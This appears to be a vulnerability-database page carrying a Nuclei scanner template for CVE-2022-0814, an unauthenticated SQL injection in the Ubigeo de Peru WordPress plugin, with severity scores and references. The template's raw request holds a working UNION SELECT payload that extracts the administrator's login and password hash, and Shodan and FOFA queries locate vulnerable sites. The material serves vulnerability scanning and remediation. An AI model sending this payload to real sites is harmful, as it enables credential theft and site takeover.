ProjectDiscoveryNUCLEI:CVE-2022-0814Ubigeo de Peru < 3.6.4 - SQL Injection
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
92.1%
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
id: CVE-2022-0814
info:
name: Ubigeo de Peru < 3.6.4 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
remediation: Fixed in version 3.6.4
reference:
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
- https://wordpress.org/plugins/ubigeo-peru/
- https://github.com/cyllective/CVEs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0814
cwe-id: CWE-89
epss-score: 0.03633
epss-percentile: 0.91467
cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: ubigeo_de_peru_para_woocommerce_project
product: ubigeo_de_peru_para_woocommerce
framework: wordpress
shodan-query: http.html:/wp-content/plugins/ubigeo-peru/
fofa-query: body=/wp-content/plugins/ubigeo-peru/
publicwww-query: "/wp-content/plugins/ubigeo-peru/"
tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'idProv'
- 'idDist'
- 'distrito'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100fb4ec31b608894f19fb2aca3539cb2003d1a72b6544dee65be1c8ef8a221d3c3022026e6ea554b2da10a70b38e5a467406a45e593c8c05d8e95855ba2c9bca7886b5:922c64590222798bb761d5b6d8e72950Related
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
92.1%